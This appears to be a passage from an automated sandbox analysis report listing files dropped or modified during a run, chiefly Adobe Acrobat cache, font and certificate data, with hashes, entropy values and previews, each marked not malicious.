09:42:09 | API Interceptor | 2x Sleep call for process: svchost.exe modified
09:42:21 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
09:43:38 | API Interceptor | 1336x Sleep call for process: conhost.exe modified
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.8008467419853399
                                                          Encrypted:false
                                                          SSDEEP:1536:CJD1YBdWK7S50AhnZ0Ag0ALzJVEbJBJlPVPEH3cNkPfF7Njg9QaQfOgFrGXuE5Tq:CJC5rk0X+MbJ72D4qgfiaDhvO7VMBf9
                                                          MD5:B677498EE2D48FDCA0861A17AEDD018D
                                                          SHA1:4EBEDB294CECA7E131846D26228309595C6B8E3B
                                                          SHA-256:E99B76A478063D88D50B23293FF94F7F69F331FFD27DF3E042AFA1E4F6A2B90B
                                                          SHA-512:4D59FC92DFF9831CDEB91F09850226F4EC9C38C94BFC97750231F7CFA38E7260540C92207A51BEECB39D5602BB3312E47FD8815ED537D1CC3D2E86CEA3419A5B
                                                          Malicious:false
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7ff9b58d, page size 16384, DirtyShutdown, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.7716205728831352
                                                          Encrypted:false
                                                          SSDEEP:1536:rSB2ESB2SSjlK/7vqlC06Z546I50AEzJ+Ykr3g16XWq2UPkLk+kFLKho38o38+W6:raza9vqcHbrq2UyUVWlW
                                                          MD5:F092BD386EC29ED6ECBC106F26589AED
                                                          SHA1:7B374E3CAF6CB815339B0228768F29AEEE8A63C4
                                                          SHA-256:8DA4A4C8BABA8EBD7B491F53C1A07AE37CB30B3575DCF3AFDA24F1014D762E6C
                                                          SHA-512:0F023F0D2EC639C26992806BA1405B39FFA8F55CDE22E167D5BF0D9E6C122CE4FB06B432235A35EA5360585FF42C5ABC3251E41D2E24C89C91BA62E5B44B3C0F
                                                          Malicious:false
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16384
                                                          Entropy (8bit):0.08149016519002025
                                                          Encrypted:false
                                                          SSDEEP:3:TyKYebx+reu8qrrvr+gvrr/wArXlallVmctlll/Sm1l1:+Kzborogn/wArXALPPv
                                                          MD5:CF6E4AF55769890E9DD606C3F87DDA08
                                                          SHA1:0DA58213BE9E053AEBD913CBFA18BD1AD73B4172
                                                          SHA-256:B84FDFCD3B63104D3A9418453769E5B056D3679A56C51DDF17B3BAA5B8F8B88A
                                                          SHA-512:91D502F9EAE85F2CACB64DE16F05518CD6F47EAA6C2767E5A3B975B73CAD1FCA0F398CCCB990E05A1679A3297452B0B125BEB82A05CABAB809B90315D4977632
                                                          Malicious:false
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):292
                                                          Entropy (8bit):5.123077995143631
                                                          Encrypted:false
                                                          SSDEEP:6:FdUq2PsZ2nKuAl9OmbnIFUt8cdDZmw+cdZkwOsZ2nKuAl9OmbjLJ:FdUvkcHAahFUt8cdD/+cdZ51cHAaSJ
                                                          MD5:2AC0B532D8F4B181EC015AF79B527FF7
                                                          SHA1:4980D2723B9F2F21A00B7D26A607015ACEA66D29
                                                          SHA-256:EA5268F35A66A099B2D3AADA7BF2425C17372DFDE5E360E4F65A5F03F776B416
                                                          SHA-512:AEF4B38704468509EA454F10F23783A5C5C195719BCFEE20C5A9C817E9228632BC9DAE063AA71B75D01F433F89752609305384D9B5E9FB6C28974561F69A1474
                                                          Malicious:false
                                                          Preview:2024/12/06-09:42:09.440 1940 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/06-09:42:09.446 1940 Recovering log #3.2024/12/06-09:42:09.446 1940 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):336
                                                          Entropy (8bit):5.223002221081224
                                                          Encrypted:false
                                                          SSDEEP:6:FxMq2PsZ2nKuAl9Ombzo2jMGIFUt8cmWZZmw+ct+kwOsZ2nKuAl9Ombzo2jMmLJ:FevkcHAa8uFUt8cmy/+cE51cHAa8RJ
                                                          MD5:D983C08055F59835DBECFB80E8D4E352
                                                          SHA1:34376E4431953747618D6388B338AF05D70C034D
                                                          SHA-256:B186A8F62942FEBD2E815CAB4086ED1D462352BB84F5C2D85B98278641D7391C
                                                          SHA-512:DF863C40FC6205467299BF568A72C01B692BD29A04395E2F796CE37AE74A59ECB84EF3AAE490D11B6FFD06CB1C7B42C5860FB90924EA266DB1CF5D1269CDE013
                                                          Malicious:false
                                                          Preview:2024/12/06-09:42:09.583 1744 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/06-09:42:09.585 1744 Recovering log #3.2024/12/06-09:42:09.586 1744 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):476
                                                          Entropy (8bit):4.971308936549284
                                                          Encrypted:false
                                                          SSDEEP:12:YH/um3RA8sq1sBdOg2HCcaq3QYiubPyP7E4TX:Y2sRdsTdMHN3QYhbC7n7
                                                          MD5:9DED1C09A5BF5786A6517CEEA68DC0C7
                                                          SHA1:F3213474F6BB0938812FFECD151F8FC6726CCBAC
                                                          SHA-256:F15AF223B9643822E857CBCCAC24A50F65AF34313C6964B7F81ACFBAE218FA3E
                                                          SHA-512:7E0ADC5AD0DFF2996E6D09E8C8124A1A8D043582DD37861A100D1BB066033F3E0E46AA85A16A418C065E36938E04BB62EE6729946311CF4099BB786035BF7A35
                                                          Malicious:false
                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341064104987871","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":179539},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:JSON data
                                                          Category:modified
                                                          Size (bytes):476
                                                          Entropy (8bit):4.9782967969994605
                                                          Encrypted:false
                                                          SSDEEP:12:YH/um3RA8sqBsBdOg2H9MZcaq3QYiubPyP7E4TX:Y2sRdsPdMHug3QYhbC7n7
                                                          MD5:04C18A356AF24BF6624C18BD9842F39D
                                                          SHA1:26B209C56CD4A47EFB5F076E959478C1E4F0A49D
                                                          SHA-256:3A3F213357D8C9B4F8037A5C6E733B6DD36F0A6580F56AD99468D548802892BE
                                                          SHA-512:EF4A11AB60D4B73B7BF6DA95F68A638C8FAC6CA4930F34E91276E00431D11E78F924BE23B6216A2AE8D9E84E1DBA63232AC23980C8DA8D55E29A90C4A4B688EB
                                                          Malicious:false
                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378056139210659","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":630874},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.11","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4553
                                                          Entropy (8bit):5.237363455532997
                                                          Encrypted:false
                                                          SSDEEP:96:odxquQuhxqVAq0Czrh6CzxtSzK3/tjsqnlfjejy4XOlPXflziHkBH:oqupGVTbzrhtzxtSzK3/dRnlLejyE4vB
                                                          MD5:01DBFA78B42E4C0CB0548077834A3F85
                                                          SHA1:5BB224D071B1EE8CBBAAD9125C7BDCF825CDFD5F
                                                          SHA-256:71728823C1A008159496B13968F3177E32F3F8884264B3F6214A9E8090972336
                                                          SHA-512:A32216F4F55E324821E0BD4949DF43B685FE733D59015C786B541892506A6B8690B069E9ADB3EB02DB88143BD5CAEBE0ADD3617AA64701BBA0EFCA57BF29844C
                                                          Malicious:false
                                                          Preview:*...#................version.1..namespace-n.X.o................next-map-id.1.Pnamespace-8da8a5d4_15b5_4830_8c1c_ca066d0e12ed-https://rna-resource.acrobat.com/.0gKY.r................next-map-id.2.Snamespace-81b0e21e_1c2a_4917_a98d_db6892e18c4b-https://rna-v2-resource.acrobat.com/.1^b..r................next-map-id.3.Snamespace-181ade60_1d4c_4d63_87fe_e85b67c781b7-https://rna-v2-resource.acrobat.com/.2....o................next-map-id.4.Pnamespace-73e7b78c_6cea_4091_906b_b0f0cc6a8ce0-https://rna-resource.acrobat.com/.3C[.[^...............Pnamespace-8da8a5d4_15b5_4830_8c1c_ca066d0e12ed-https://rna-resource.acrobat.com/D..B^...............Pnamespace-73e7b78c_6cea_4091_906b_b0f0cc6a8ce0-https://rna-resource.acrobat.com/..Ga...............Snamespace-181ade60_1d4c_4d63_87fe_e85b67c781b7-https://rna-v2-resource.acrobat.com/.;0ca...............Snamespace-81b0e21e_1c2a_4917_a98d_db6892e18c4b-https://rna-v2-resource.acrobat.com/.\.go................next-map-id.5.Pnamespace-5e456334_9beb_4082_9dbc_
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):324
                                                          Entropy (8bit):5.141236030377576
                                                          Encrypted:false
                                                          SSDEEP:6:FbVIq2PsZ2nKuAl9OmbzNMxIFUt8cbRFZZmw+cbj7TRFkwOsZ2nKuAl9OmbzNMFd:F5IvkcHAa8jFUt8c3Z/+cPXRF51cHAab
                                                          MD5:5ABFCE4D9D9A72757C5863624D0943C5
                                                          SHA1:E2852712F98110A48142D56F8F3B326E2F5D9712
                                                          SHA-256:5BEBD49546E0D94A06F13E64A24105EA1B0B405EB70600EAF268285D13B06A7E
                                                          SHA-512:5459B41758EC4EB043AB25F80FE5611DB15CFE625BF71A4C6DF2110E5FA65F3ADE958D99A34DC6A4A88FB24B54DCBA98407B8ABED12D52C3F2FD2E1331E760C5
                                                          Malicious:false
                                                          Preview:2024/12/06-09:42:10.130 1744 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/06-09:42:10.190 1744 Recovering log #3.2024/12/06-09:42:10.204 1744 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                          Category:dropped
                                                          Size (bytes):86016
                                                          Entropy (8bit):4.438578910983537
                                                          Encrypted:false
                                                          SSDEEP:384:yeCci5GViBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:NZurVgazUpUTTGt
                                                          MD5:3816518F89B6476E5998B4D6DAFDA2C5
                                                          SHA1:3E694CF6E5B73B5CB2C4C28EA89AB3BDC944627B
                                                          SHA-256:4DCDD596065AA925A8A8B49EEA12C1E34E0CA688326231068A52A1331B5CE49A
                                                          SHA-512:CC61B5236778A646C9C892224A815EC9519440EF115D4B26DEF079DA123326C5CF241244E6D45C59BA89EF929FCCCFE61945CE777D88328AED0557E096823EE0
                                                          Malicious:false
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite Rollback Journal
                                                          Category:dropped
                                                          Size (bytes):8720
                                                          Entropy (8bit):3.7678580561285004
                                                          Encrypted:false
                                                          SSDEEP:48:7MBJioyVAioyuoy1C7oy16oy1iKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1OX:7WJuAeJXjBiBb9IVXEBodRBku
                                                          MD5:642C7438197BB01BA984C41E653AA39D
                                                          SHA1:DDEFC04479CC4F40FA1BC9BA113FA62C48E9B1AE
                                                          SHA-256:0F8EF9BFC794B1A8B3EE6825E0CBF522C794E74E80886AD5D32CBB99976941B2
                                                          SHA-512:E2DF35A04EE64F72924529BBBC039C1C61F08F7D8ADD861BA2B3A377DF36585421D476D0EBBB310FE9EF624EE1D604AC6895ACC6C314F793D6C05934E12F0385
                                                          Malicious:false
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:Certificate, Version=3
                                                          Category:dropped
                                                          Size (bytes):1391
                                                          Entropy (8bit):7.705940075877404
                                                          Encrypted:false
                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                          Malicious:false
                                                          Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                          Category:dropped
                                                          Size (bytes):71954
                                                          Entropy (8bit):7.996617769952133
                                                          Encrypted:true
                                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                          Malicious:false
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):192
                                                          Entropy (8bit):2.7895108629891827
                                                          Encrypted:false
                                                          SSDEEP:3:kkFklhd6IdkfllXlE/HT8k2Skh/XNNX8RolJuRdxLlGB9lQRYwpDdt:kKFIjT8aqdNMa8RdWBwRd
                                                          MD5:FD8BDCF4EACBC3AA2E311043327A650C
                                                          SHA1:616C90681EC5B09AF30B9AAB988A638B8A7CD8C1
                                                          SHA-256:A3947A53A91381F7F6D9BDB7BBA4A62CE4EC851418520CB567688DE40F672EF2
                                                          SHA-512:C41C8048FA28CEAC1FF83CD160A8830D71B027DBCE2BC9396CC2FE97C442C65E76838F4111BD916DA4C2AF158DAD6B6647D62B72FB421D7807E0FEC90A40F43D
                                                          Malicious:false
                                                          Preview:p...... .........8...G..(....................................................... ..........W.....7..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):328
                                                          Entropy (8bit):3.229173143320742
                                                          Encrypted:false
                                                          SSDEEP:6:kKB9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:oDImsLNkPlE99SNxAhUe/3
                                                          MD5:17487550E44481D49AFFE53D545EA374
                                                          SHA1:E37DE010B2DC80B2197A53BB8EC082A14AD84F57
                                                          SHA-256:D3352701EB2013FB6D3969C1F8C0BC257FA20846E6EBC38C68E601F83C952702
                                                          SHA-512:FE226CACD81ACAB47551CBD5E400BF2F8A001BDC58BEBA82EBBE0027EB339D8F7E52BD12AF56CFAF7E181243CA3963AF2A046F37DA919EA1C8CC26F66551F4E7
                                                          Malicious:false
                                                          Preview:p...... .........yo!.G..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:PostScript document text
                                                          Category:dropped
                                                          Size (bytes):1233
                                                          Entropy (8bit):5.233980037532449
                                                          Encrypted:false
                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                          Malicious:false
                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:PostScript document text
                                                          Category:dropped
                                                          Size (bytes):10880
                                                          Entropy (8bit):5.214360287289079
                                                          Encrypted:false
                                                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                          MD5:B60EE534029885BD6DECA42D1263BDC0
                                                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                          Malicious:false
                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4
                                                          Entropy (8bit):0.8112781244591328
                                                          Encrypted:false
                                                          SSDEEP:3:e:e
                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                          Malicious:false
                                                          Preview:....
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):2145
                                                          Entropy (8bit):5.073454340409002
                                                          Encrypted:false
                                                          SSDEEP:48:Ys/Y0Oqc0aIJYnW2IKbI8CIgIdTciIp0INI90IzlIdKsaIZ:nBOOhSFTeI95+Ksh
                                                          MD5:42C859CABE5BB4BE8B06C3A5883BF6C3
                                                          SHA1:0462A765D25CAFC61062FBD7EEF3C8461E0ED000
                                                          SHA-256:D8946E414F351E29B72D6C603EC11BE43875BD58819B57D782ED30F9E8126D3F
                                                          SHA-512:67C446D3D8E6C166E7848AB2D3F9D5CA0CEEC0650406672E546DB72A8EBAADFAEA6348D8B596E1C07B24B86EE1B093528D07AD25813F52941CF39218A46B7CAE
                                                          Malicious:false
                                                          Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1733496132000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"dd0f17db57e5734e373d1cdbdf192ce4","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696504100000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"3167b843a2a5ade9e2e656a38eb13d42","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696504100000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"064db7ab127b8d12f389c27ca0b1e226","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696504095000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"c7e4fd7bca43d109b99402cc03ec13b7","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696503445000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"9fbd47849261fc802c1ecaef20121b30","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696503445000},{"id":"DC_Reader_Edit_LHP_Banner"
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 28, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 28
                                                          Category:dropped
                                                          Size (bytes):12288
                                                          Entropy (8bit):1.4575647280939001
                                                          Encrypted:false
                                                          SSDEEP:48:TFl2GL7msrhoGgpP5ZgrI2yLviuFuI7Pw:/VmsrhoGgt5ZgMp74
                                                          MD5:5F6B39C2F9A18F7C50054B3F7FA7BC98
                                                          SHA1:43ECAB0A27300FC2698F1EEBE988DDFAC7CFF6DB
                                                          SHA-256:B9DC79EBD631F61805420AF262134182188E2E3083A744D898AD9E39309FA755
                                                          SHA-512:AB90E3190B8174F6A0AC381610F10ABB08E163CA1A1E40E0DD51C116F23F54EB036B12ACCE919EA1BA72B9B8D92B7DC3E7EE505AF34407E608D6E1C9D159FDEE
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite Rollback Journal
                                                          Category:dropped
                                                          Size (bytes):8720
                                                          Entropy (8bit):1.963342184020745
                                                          Encrypted:false
                                                          SSDEEP:48:7MdhoGgpP5ZgrI2lLviuFuI7PehuqVl2GL7msu:74hoGgt5ZgVp72huaVmsu
                                                          MD5:0AD3A510447999ED80B06637783CEADB
                                                          SHA1:4027F331D5C443316FD6D841B96B800F0C614FBD
                                                          SHA-256:E8235E4DEAE7CDF4521F4C212B2C9F57104954B0DD28CB5C9A120C39F5ECEC6E
                                                          SHA-512:B65B0B001988BCC5411EE47FD348C41D9A27B585B52CAC74B8DA598E8CD64CA52682B7F3036F9E85677C55915540FE835B53C2274282909D66C0D7DEDC0F7527
                                                          Malicious:false
                                                          Preview:.... .c........3..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):66726
                                                          Entropy (8bit):5.392739213842091
                                                          Encrypted:false
                                                          SSDEEP:768:RNOpblrU6TBH44ADKZEgMpwsgJyPRHe5wJQOmr4hysvqZ6V2Yyu:6a6TZ44ADEUwsgUE5Gmr4hkG2K
                                                          MD5:C5F1F0EE761D71455DC45A99D47E2E57
                                                          SHA1:C3058C2BD8CD7356B03A33DBABC6A418CCC2287F
                                                          SHA-256:13FF1461137D5E4156CB9B1453575D36D5659D3C3628F6BC41085E78277BBB3B
                                                          SHA-512:20EF7904F9C5AB235D882DCE25E5AF32D5B3748C9DEA3D8431C025105C8C132AB868CFC6FA1F7749EBE856873A8D667DFC460AEB2C33CA6523E0904848E9235D
                                                          Malicious:false
                                                          Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):11608
